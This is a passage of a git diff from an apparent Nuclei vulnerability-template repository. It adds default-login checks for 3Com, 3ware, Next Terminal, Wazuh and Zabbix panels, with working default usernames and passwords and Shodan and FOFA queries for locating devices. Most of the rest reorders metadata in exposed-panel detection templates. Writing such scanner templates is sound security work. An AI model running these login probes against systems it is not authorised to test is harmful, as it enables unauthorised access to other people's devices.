4a0a0047304502202588a25e1042a61777bdb84f557b67a9f93b51713a37c41b28d81bbedf12324b022100c4770f328e89c8c133189d9c7d74131d77f77ea05e218d41dd03e4917674b2ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/3com/3Com-wireless-default-login.yaml b/http/default-logins/3com/3Com-wireless-default-login.yaml new file mode 100644 index 0000000000..321a07e084 --- /dev/null +++ b/http/default-logins/3com/3Com-wireless-default-login.yaml @@ -0,0 +1,52 @@ +id: 3Com-wireless-default-login + +info: + name: 3Com Wireless 8760 Dual Radio - Default Login + author: ritikchaddha + severity: high + description: | + 3COM Wireless 8760 Dual Radio contains a default login vulnerability. Default admin login password 'password' was found. + reference: + - https://www.speedguide.net/routers/3com-wl-546-3com-wireless-8760-dual-radio-11abg-1256 + metadata: + max-request: 1 + fofa-query: title="3COM" + tags: default-login,3com + +http: + - raw: + - | + POST /index.htm HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + userid={{username}}&passwd={{password}}&Submit=LOGIN + + - | + POST /login.html HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + + stop-at-first-match: true + attack: pitchfork + payloads: + username: + - admin + password: + - password + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'alt="Advanced Configuration"' + - 'image/setup_wizard' + condition: and + + - type: status + status: + - 200 +# digest: 4b0a00483046022100a7a5661481f35e84ca927a1574e6a7b1b27ccb361354be2361a526339dec9a5502210098c54dbb1de14bbe6bc295ca69566df20d65ab0b3bb0f9ffcdf3f8815c7684cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/3ware-default-login.yaml b/http/default-logins/3ware-default-login.yaml new file mode 100644 index 0000000000..886a63fc17 --- /dev/null +++ b/http/default-logins/3ware-default-login.yaml @@ -0,0 +1,47 @@ +id: 3ware-default-login + +info: + name: 3ware Controller 3DM2 - Default Login + author: ritikchaddha + severity: high + description: | + The default password for logging in to the 3DM2 web interface of a 3ware controller is "3ware" for both the Administrator and User accounts. + reference: + - https://www.thomas-krenn.com/en/wiki/3ware_Controller_3DM2_Password + metadata: + max-request: 1 + shodan-query: title:"3ware" + tags: default-login,3ware,3dm2 + +http: + - raw: + - | + POST /login.html HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + whopwd={{username}}&thepwd={{password}} + + attack: pitchfork + payloads: + username: + - a + password: + - 3ware + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'now logged in' + + - type: word + part: set_cookie + words: + - 'TDMUSER=' + + - type: status + status: + - 200 +# digest: 4b0a0048304602210099fa2957041db6e412d55e609b245a5dce22832aec73c64d7a35a1504ec4e05d0221009c39a60df53ef9ae7504918b58cd690edd32bb9d2a2ac5f6338604d01719c650:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/druid/druid-default-login.yaml b/http/default-logins/druid/druid-default-login.yaml index f7997ffd4b..d213fac914 100644 --- a/http/default-logins/druid/druid-default-login.yaml +++ b/http/default-logins/druid/druid-default-login.yaml @@ -48,4 +48,4 @@ http: - type: regex regex: - "^success$" -# digest: 490a0046304402207685a2b5d1bc067ed09ea41b9a709ca509eaed6ef5bcce0dd766f2a6a5821c8902205642ec2bf78a07c81e8f01ed32ba3e45da52810e74906ab8da419df7c7b13865:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022009fa9f93cffc96ab9329966d5478d6c47ffde480842b6779887b884a5eb061ef022100e24d139dafc120ae957fc612e01a3e3594d01dd522b3abf8dd4357df8ad27b32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/ibm/ibm-dcbc-default-login.yaml b/http/default-logins/ibm/ibm-dcbc-default-login.yaml index b8f83b2ded..c9d582e911 100644 --- a/http/default-logins/ibm/ibm-dcbc-default-login.yaml +++ b/http/default-logins/ibm/ibm-dcbc-default-login.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022016a80ca652cc1c45b3f6d4c92fce061f9fc9d9cb8d9cfe96626d34be23038086022100bc041f5982bff0cd5c6c76e96a375e3be9dcfdd433a205870a938cc378c23418:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022040f72a433ca91e4c98b506c1cc01f6104d9c69ab77552363a33c1c2a6af5af570220612d68c051d89b8821deb34026dc1141066f7e695be2e46f4e40463b67f63b25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/ibm/ibm-dcec-default-login.yaml b/http/default-logins/ibm/ibm-dcec-default-login.yaml index 4bb0f239aa..ef5e77eff5 100644 --- a/http/default-logins/ibm/ibm-dcec-default-login.yaml +++ b/http/default-logins/ibm/ibm-dcec-default-login.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eda449ebab75e6434f62e1e6ad214e7a3a4cbc01f47209e6f2367427fc73892f02202b8e060110bc0d3aed5fc0e773daa6416705f332e863b1f851a004b1364615be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022048ead058e6bd0bbc7941e3094c97bc21e6639d7558a39663f21b990fbad49c2a02207a525b2a5d7168da8e0525f0f496385187c16c735d5d3ec9d79e7bbcfe976c6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/ibm/ibm-dsc-default-login.yaml b/http/default-logins/ibm/ibm-dsc-default-login.yaml index 682a64e110..48e78e47cb 100644 --- a/http/default-logins/ibm/ibm-dsc-default-login.yaml +++ b/http/default-logins/ibm/ibm-dsc-default-login.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220196e8fb1a9ddef98855c38f2719f3c5405d7c51e90772f82c6d35c0d7596cc06022100cc5faf04711e248eb7c4c8b2fd597c8346977de7602568861691790ec7a56b1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009c9b179e51c04c83f4fb2be14a8f3740575a5ba70626e34bfb5d9df2f6d19789022100d452f7d5dbf10e91bf363f801d01e4fbc052e48f4179d707ca9c7ec219e860b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/ibm/ibm-hmc-default-login.yaml b/http/default-logins/ibm/ibm-hmc-default-login.yaml index 27cf74663a..05c4981644 100644 --- a/http/default-logins/ibm/ibm-hmc-default-login.yaml +++ b/http/default-logins/ibm/ibm-hmc-default-login.yaml @@ -41,4 +41,4 @@ http: - "status_code == 303" - "contains(header, 'Location: /hmc/connect;jsessionid=')" condition: and -# digest: 4b0a004830460221008a84665b08818591fae940c66eee27f2efcfc73791ead39a7747e00ec665b68c022100c5cdf8ad68273505110675370849c4298a8d7f481b8c42f797d5c55402bace7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220178b1718907a5418912425a6eaf4d800282d333d1e173e3a3ccb676d045d2b8302201ddf4df0bd77fec9c8ff23fa464b18adb1bf71f967090c5873ce00d211164e6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/ibm/imm-default-login.yaml b/http/default-logins/ibm/imm-default-login.yaml index 67e83595dc..ff93a2df8a 100644 --- a/http/default-logins/ibm/imm-default-login.yaml +++ b/http/default-logins/ibm/imm-default-login.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201d12ea2cf004fcd15a9a7a2d3986082c7bd2a2a7ad9523d89183c9586208c57a02206569360cb03dad0fbea7cf165d042bb73702d00f9eba0232f855974bf34e3f62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022053455cd067d472404c212995c8e43ae6c2601b35991e2e769b761a53657e2af8022100eb5d63b688fc790d2e11e68ce980539dd706d1a1de76cbaf28c8a624ffb767c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/ispconfig-default-login.yaml b/http/default-logins/ispconfig-default-login.yaml index f297f5ec94..8151c6d669 100644 --- a/http/default-logins/ispconfig-default-login.yaml +++ b/http/default-logins/ispconfig-default-login.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fe9faf7e0ee8e29d057622e962ae184d6a435b89e53997a6de605bd6f4969c32022100f57a156c663fa35abbca2dbe8327f9d6191fb44d8ec172f5f61b3ec49d665dd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008a28f1d5944e66f8110267e1ef972142f26ab267c802b3014d9e149936f59664022100848b98acb511571071b1ad550692d756860ad969ec7f53b87045972e9996492b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/lucee/lucee-default-login.yaml b/http/default-logins/lucee/lucee-default-login.yaml index e12f0de6ae..8485767e69 100644 --- a/http/default-logins/lucee/lucee-default-login.yaml +++ b/http/default-logins/lucee/lucee-default-login.yaml @@ -42,4 +42,4 @@ http: - '!contains(body, "Access is protected")' - 'status_code == 200' condition: and -# digest: 4a0a00473045022100ffc2b819ff95218f966decbf485ac9ea68eb25f62172ea1756b376a1097953ce0220622081774ac714fd4e65b0d515e09e242b91a26b2b6abdb78cbd311dc463bacb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202e0ae3fc3c27bb5be817fc4d300fad5b9a7ec3d275030d9bd37c2e36e714fa56022100cf7dc6d65de5d5bb5bde17eb3b73ff3ce67a31388479816727c0ad2fe68b7376:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/next-terminal/next-terminal-default-login.yaml b/http/default-logins/next-terminal/next-terminal-default-login.yaml new file mode 100644 index 0000000000..fd94360b85 --- /dev/null +++ b/http/default-logins/next-terminal/next-terminal-default-login.yaml @@ -0,0 +1,46 @@ +id: next-terminal-default-login + +info: + name: Next Terminal - Default Login + author: ritikchaddha + severity: high + description: | + Next Terminal default login was discovered. + reference: + - https://github.com/dushixiang/next-terminal + metadata: + max-request: 1 + fofa-query: title="Next Terminal" + verified: true + tags: default-login,next-terminal,next + +http: + - raw: + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"username":"{{username}}","password":"{{password}}","remember":false} + + attack: pitchfork + payloads: + username: + - admin + password: + - admin + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'message":"success' + - 'code":1' + - 'data":"' + condition: and + + - type: status + status: + - 200 +# digest: 4a0a00473045022047000b6be585f125bb59e74eaa3738df10e5fedd6f7f79daf80c87bd334d0244022100aa08bbf3a773e10611aa8076f9ead21582e2b7e190382f247d48976fb5618328:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/wazuh-default-login.yaml b/http/default-logins/wazuh-default-login.yaml index d2bd97b963..2f31694d0f 100644 --- a/http/default-logins/wazuh-default-login.yaml +++ b/http/default-logins/wazuh-default-login.yaml @@ -2,33 +2,45 @@ id: wazuh-default-login info: name: Wazuh - Default Login - author: theamanrawat + author: theamanrawat,denandz,PulseSecurity.co.nz severity: high description: | Wazuh contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. reference: - https://documentation.wazuh.com/current/user-manual/user-administration/password-management.html - https://wazuh.com + - https://documentation.wazuh.com/current/deployment-options/docker/wazuh-container.html#single-node-deployment metadata: verified: true - max-request: 4 + max-request: 6 shodan-query: title:"Wazuh" tags: wazuh,default-login http: + - method: GET + path: + - "{{BaseURL}}/app/login" + + extractors: + - type: regex + part: body + name: osd + group: 1 + internal: true + regex: + - '"version":"([0-9.]+)"' + - raw: - - | - GET /app/login?nextUrl=%2Fapp%2Fwazuh HTTP/1.1 - Host: {{Hostname}} - | POST /auth/login HTTP/1.1 Host: {{Hostname}} Osd-Version: {{osd}} + osd-xsrf: osd-fetch Content-Type: application/json {"username":"{{username}}","password":"{{password}}"} - attack: pitchfork + attack: clusterbomb payloads: username: - "admin" @@ -36,6 +48,7 @@ http: password: - "admin" - "wazuh" + - "SecretPassword" stop-at-first-match: true matchers-condition: and @@ -56,13 +69,4 @@ http: - type: status status: - 200 - - extractors: - - type: regex - name: osd - group: 1 - regex: - - '"version":"([0-9.]+)"' - internal: true - -# digest: 4b0a00483046022100de2c876067d0aa43fb62771bff3c3adea76873a9f0982f98856a1ed321b58d48022100a60ef9271fd209ecadc68b365c82e4176cd78fe24526dcbe7a8cd8772b0337cf:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ab2051c304c035f5529f66430ea1105c4cf31c1d8f5ff87e994cf6f1061c1f7202204a9b106ace1ff87641cc961e9aa127bed0852ca04614f8d5ef2ed286a17d85bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/webmethod/webmethod-integration-default-login.yaml b/http/default-logins/webmethod/webmethod-integration-default-login.yaml index e539379df1..595c70e092 100644 --- a/http/default-logins/webmethod/webmethod-integration-default-login.yaml +++ b/http/default-logins/webmethod/webmethod-integration-default-login.yaml @@ -63,4 +63,4 @@ http: - Invalid credentials negative: true condition: and -# digest: 4a0a004730450220115d89c488b0862bb1273fe0b0298087afa5b74b011991ae1cebba5921795590022100a3bbc39dba847eadccd27ed89d597a41e3a4508393fae04c9c017f35f0b9db36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ad4f93ac5744b9b82b0f40b400f65237195db254af03f8af318f97a66bf5885802206bf7da16c81861266751ba6bc4bf14fc33c4a3319ff239f15b5557348e09a9af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/default-logins/zabbix/zabbix-default-login.yaml b/http/default-logins/zabbix/zabbix-default-login.yaml index b492e5e252..0f957d6459 100644 --- a/http/default-logins/zabbix/zabbix-default-login.yaml +++ b/http/default-logins/zabbix/zabbix-default-login.yaml @@ -18,7 +18,7 @@ info: http: - raw: - | - POST /index.php HTTP/1.1 + POST {{path}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest @@ -26,11 +26,14 @@ http: name={{username}}&password={{password}}&autologin=1&enter=Sign+in payloads: + path: + - /index.php + - /zabbix/index.php username: - Admin password: - zabbix - attack: pitchfork + attack: clusterbomb matchers-condition: and matchers: @@ -42,5 +45,4 @@ http: - type: status status: - 302 - -# digest: 4b0a00483046022100bc45ed8e125e0d3a61aec24b54af545cb89f527e32d335145ac70aed44286d25022100d35dc718c76ceac0bf8334b3e3b8395ab4274fbc57dc8b6abc0316b1e7c1d82c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206c2b96efb385e67d611c7276844293bc88783570392f427628e2a4c05dd7a3b502210094b16a3c48cce397175fe585743b9e87e3db962d6a73a6ec20ca8c5881c9a8be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/3cx-phone-management-panel.yaml b/http/exposed-panels/3cx-phone-management-panel.yaml index 6058cf0974..2a0e1a613a 100644 --- a/http/exposed-panels/3cx-phone-management-panel.yaml +++ b/http/exposed-panels/3cx-phone-management-panel.yaml @@ -11,16 +11,16 @@ info: - https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:3cx:3cx:*:*:*:*:*:*:*:* metadata: + google-query: intitle:"3CX Phone System Management Console" max-request: 1 - vendor: 3cx product: 3cx shodan-query: - http.title:"3CX Phone System Management Console" - http.favicon.hash:970132176 - google-query: intitle:"3CX Phone System Management Console" + vendor: 3cx tags: panel,3cx http: @@ -34,4 +34,4 @@ http: - "3CX Phone System Management Console" - "Welcome to the 3CX Management Console" condition: or -# digest: 4b0a00483046022100def05b20a479ba44ab3108895f2f1f18f9945b2d575559d6b0c65178e198d4df022100b9e3a464abd5618c578bdb5363b50b900cbbecbf66821ac63bfeca8bb2573630:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203780f52a668c97f351e08942ed81928742a986b3844ec6ea48dd292d385e8996022100bf37bba4863af2671c39d779c0290d83f3c3eccd6563353643d25c2154d7fc1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/3cx-phone-webclient-management-panel.yaml b/http/exposed-panels/3cx-phone-webclient-management-panel.yaml index a0b9b4bdfc..9b2a5c4d3e 100644 --- a/http/exposed-panels/3cx-phone-webclient-management-panel.yaml +++ b/http/exposed-panels/3cx-phone-webclient-management-panel.yaml @@ -11,14 +11,14 @@ info: - https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:3cx:3cx:*:*:*:*:*:*:*:* metadata: + google-query: intitle:"3CX Webclient" max-request: 1 - vendor: 3cx product: 3cx shodan-query: http.title:"3CX Webclient" - google-query: intitle:"3CX Webclient" + vendor: 3cx tags: panel,3cx http: @@ -32,4 +32,4 @@ http: - " <title>3CX Webclient" - '' condition: or -# digest: 4b0a00483046022100be32a4d18a68ccbee735d5f889bed826bcce460cf82ed100dc3bf221eaf7ea2b022100add94d100efd1aafdb8247cc5f2e0453da0cc700e205d013d2439b5953c7b0a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f60c410ca197feff3a6ae75f85110d48d1de1eed7b721fcdc802e824bcbf1dbb02202150b4cc1ee3346432bbb961f31f63d085928cad61b631852434da1a9e690232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/acemanager-login.yaml b/http/exposed-panels/acemanager-login.yaml index 7e00df874c..9ab19d6a3b 100644 --- a/http/exposed-panels/acemanager-login.yaml +++ b/http/exposed-panels/acemanager-login.yaml @@ -7,12 +7,13 @@ info: description: ACEManager was detected. ACEManager is a configuration and diagnostic tool for the Sierra Wireless AirLink Raven modems. classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:sierrawireless:airlink_mobility_manager:*:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: sierrawireless - product: airlink_mobility_manager fofa-query: app="ACEmanager" - tags: panel,login,tech,acemanager + max-request: 1 + product: airlink_mobility_manager + vendor: sierrawireless + tags: panel,login,tech,acemanager,sierrawireless http: - method: GET @@ -36,4 +37,4 @@ http: part: body regex: - 'ALEOS Version ([0-9.]+) \| Copyright &co' -# digest: 4a0a00473045022100ee5657dd1410d2c7455d9ae50c45a4f3603145c63714a99e9d6216d44190237b02202649f589d5eea771dcca03da6b3590bac320718ba31004d7fe121c8a178f4114:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022044705dff86109f891e630e39f981bfbca44cbef4cce7cdb9c760c2a860f07e59022100e2dedc81057f3fb8f2a4d7d3cf916ec5415ce7b69c058cb38f6989a4812307e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/acenet-panel.yaml b/http/exposed-panels/acenet-panel.yaml index d51b03b1b4..1e1d7774d8 100644 --- a/http/exposed-panels/acenet-panel.yaml +++ b/http/exposed-panels/acenet-panel.yaml @@ -5,9 +5,9 @@ info: author: DhiyaneshDk severity: info metadata: + fofa-query: body="Login @ Reporter" max-request: 1 shodan-query: http.favicon.hash:-1595726841 - fofa-query: body="Login @ Reporter" tags: panel,login,acenet,acereporter http: @@ -26,5 +26,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022004780fe2201d05e2c99677df8fa4404b1e2beda707aff8d6cd407c537994472d0220533c9dc5bfb969e0158b175aa46f4c7543c0e34108b39810a1bffd9fcc050a20:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207267b35936d9aeb6cc4a04e7d12e755474f0ef18bc419f376706117f22a55b27022100f5916908fe214a72ab7ff4a5deb4d32503fa2f849f324b08e5b3911f0564ad1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/achecker-panel.yaml b/http/exposed-panels/achecker-panel.yaml index b628eb202f..7e5126a8e1 100644 --- a/http/exposed-panels/achecker-panel.yaml +++ b/http/exposed-panels/achecker-panel.yaml @@ -9,7 +9,6 @@ info: - https://achecker.achecks.ca/checker/index.php classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -32,5 +31,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100d294327ede6698f204844ccaf53fe97fdf8d6cf00f4b78e0fec3842154ed4ecc02204d5549d35ae597dbfc67c7049f9a6d26680fcfe0392a19026814e5080897372a:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b73eaecd063f044d48a287ed2c9437fb81d3076c61245cad201697fe92b2abc0022100cef2ef3738cadca148321ee53abd8ac116179663022c162ecb0b31893188d76b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/acrolinx-dashboard.yaml b/http/exposed-panels/acrolinx-dashboard.yaml index 7af1fbe0f6..aef9394078 100644 --- a/http/exposed-panels/acrolinx-dashboard.yaml +++ b/http/exposed-panels/acrolinx-dashboard.yaml @@ -10,10 +10,10 @@ info: classification: cwe-id: CWE-200 metadata: - max-request: 1 - shodan-query: http.title:"Acrolinx Dashboard" fofa-query: title=="Acrolinx Dashboard" google-query: inurl:"Acrolinx Dashboard" + max-request: 1 + shodan-query: http.title:"Acrolinx Dashboard" tags: acrolinx,panel http: @@ -33,5 +33,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402207ae56407cafcb75004f6281f2850835ac2a0cf2ccc13c6895fab379acbad49dd02203e356b7d395158300a28c087e2a0b65382521cc84619cff46440ed6bf410b7d1:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205965d1f8f3014c3afa77c395ccd721fb9d246c033490941dc9a4a2144ce9079d02204aa25b74e616928bf04e4e7001533d146ffe81a887963fd91dd6c902341394bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/acti-panel.yaml b/http/exposed-panels/acti-panel.yaml index aaef71ecce..0ed0743974 100644 --- a/http/exposed-panels/acti-panel.yaml +++ b/http/exposed-panels/acti-panel.yaml @@ -5,10 +5,10 @@ info: author: DhiyaneshDk severity: info metadata: - verified: true + fofa-query: app="ACTi-视频监控" max-request: 1 shodan-query: title:"Web Configurator" html:"ACTi" - fofa-query: app="ACTi-视频监控" + verified: true tags: acti,panel,login,detect http: @@ -28,5 +28,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220785400835964c5c14a6f279a6f5e5d0afe26cc715705e3af543c71c11c7d83a402210088beecae19b2fab93f791ed6960202bc8ed002bfb3b46e98b0548c8bc2a6863f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100886ee667fdd7be168381aefee8bb43b68e265fcaf00e08e264018d0480f4858302201ec09ff056d43319aabb9f66204cc95b11edac9ee877aaa5c4b25b0fe0db1c2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/active-admin-exposure.yaml b/http/exposed-panels/active-admin-exposure.yaml index 19d8488092..f8f370d602 100644 --- a/http/exposed-panels/active-admin-exposure.yaml +++ b/http/exposed-panels/active-admin-exposure.yaml @@ -9,10 +9,11 @@ info: - https://activeadmin.info/ classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:activeadmin:activeadmin:*:*:*:*:ruby:*:*:* metadata: max-request: 1 - vendor: activeadmin product: activeadmin + vendor: activeadmin tags: panel,activeadmin http: @@ -26,4 +27,4 @@ http: - "active_admin_content" - "active_admin-" condition: and -# digest: 4b0a00483046022100e0ec3e97a4a73fa3d26c1de21582539876b4c9b8db79305892bddee289900bd602210093c0d64fb5b3bf314155743d5155211614a7b50f2ceba7604f0079adedb92524:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008ff7c3e5ca9ea60724d5aa6d320d161dad483cbbe185ad21cda9f0bc96afe14002210096167ed3964f4ff49a5ac96d58bbfb00c29ee1301adad51286857d0cd9f279b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/activemq-panel.yaml b/http/exposed-panels/activemq-panel.yaml index fd06c9b896..14fcf8c1d5 100644 --- a/http/exposed-panels/activemq-panel.yaml +++ b/http/exposed-panels/activemq-panel.yaml @@ -9,10 +9,11 @@ info: - https://activemq.apache.org/ classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: apache product: activemq + vendor: apache tags: panel,activemq,apache http: @@ -26,4 +27,4 @@ http: - '

Welcome to the Apache ActiveMQ!

' - 'Apache ActiveMQ' condition: and -# digest: 490a00463044022015326e986aad465597926bed07bda0e7fc3b1f962b9b3302f5aaabac00bf9cc20220600e01e44cc9b9472df6e9fff904f810b803a51d6e39f0330c2f1fe522823ec2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206c143bc3e4e0af4742044d95c50fe48e84f75d59138f4929bce3fc53f2f14090022100e52ac76beab4ea68c78856d78fc874725d38389f0d4cb5da0c6a0e12223eabe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/acunetix-login.yaml b/http/exposed-panels/acunetix-login.yaml index 49efcf53ad..1fde288b23 100644 --- a/http/exposed-panels/acunetix-login.yaml +++ b/http/exposed-panels/acunetix-login.yaml @@ -7,12 +7,11 @@ info: description: Acunetix login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: - verified: true max-request: 1 shodan-query: title:"Acunetix" + verified: true tags: panel,acunetix http: @@ -37,5 +36,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210082f2a5bb0b70e15ab38cb2e5e5584ba2242080ea0ef5175fbf7ea8a4dc0a07e30220038a46657c4e79fc012e46c4aad500081b8aa8f11492ad5d9e4909686cedb69b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207d5cb967d632d9fe78d48b71dbf15a42b83f214f2f5418926c45d471bb980605022100a298f9a1bd77c2f13b4575c74a8309e0bbf2e6973187f6a2a34df0909be17576:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/addonfinance-portal.yaml b/http/exposed-panels/addonfinance-portal.yaml index a406d98dc9..204507ff2e 100644 --- a/http/exposed-panels/addonfinance-portal.yaml +++ b/http/exposed-panels/addonfinance-portal.yaml @@ -6,9 +6,9 @@ info: severity: info description: AddOnFinance Portal Panel was detected. metadata: - verified: "true" max-request: 1 shodan-query: title:"AddOnFinancePortal" + verified: "true" tags: panel,addon,finance,detect http: @@ -26,5 +26,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206409d6b70ca25b45a79369512e7e277e896b66bf45d0994de8c7fe6037165087022100aa0732f67e7aa217c670b1552d6791576b62efe440758562e0bf0f6b0a4892ab:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ee3ebff11567dbbf51ce9c7a22464e36fe9204b034b22fc7a14b81e0d7f584a70220789eec08d407b306b4fe49b64f565aeba67ffa9d3817091e91784a243f42f11a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adhoc-transfer-panel.yaml b/http/exposed-panels/adhoc-transfer-panel.yaml index 61b098e895..d49d385a39 100644 --- a/http/exposed-panels/adhoc-transfer-panel.yaml +++ b/http/exposed-panels/adhoc-transfer-panel.yaml @@ -6,11 +6,11 @@ info: severity: info description: WS_FTP Ad Hoc panel was detected. metadata: - verified: true max-request: 1 - vendor: progress product: ws_ftp shodan-query: http.title:"Ad Hoc Transfer" + vendor: progress + verified: true tags: panel,wsftp,ad-hoc,detect,login,progress http: @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009e8ba7a02ef3442ab201625f85d1776f1c3248de17960995088ce1cd4f36fb50022067fe11fb4edd15f1c4e74e310b64e80c2b5bd77e228d27f4f30fdafc7883279d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201bbd8e99562d715f0264d0492ba913fa6d3cf53694a8747a24043f25f74f3d0a02205a28ff4f92dbf4cd94ad0953664911a8eee6bb5e0ab93a5e020bd71b18421b87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/adiscon-loganalyzer.yaml b/http/exposed-panels/adiscon-loganalyzer.yaml index 41ba5d061b..784bfe9f8a 100644 --- a/http/exposed-panels/adiscon-loganalyzer.yaml +++ b/http/exposed-panels/adiscon-loganalyzer.yaml @@ -11,10 +11,11 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 + cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: adiscon product: loganalyzer + vendor: adiscon tags: adiscon,loganalyzer,syslog,exposure,panel http: @@ -41,4 +42,4 @@ http: part: header words: - 'text/html' -# digest: 4b0a0048304602210098d4ad89a4d26dbb012ebc1fa10f41289323d65014a34d03c6700fce5f1c69f502210091d4a5b871a72d6bd3e2e8a3c8b0d73136be11ce0f64ff54e519117dd4b8d744:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 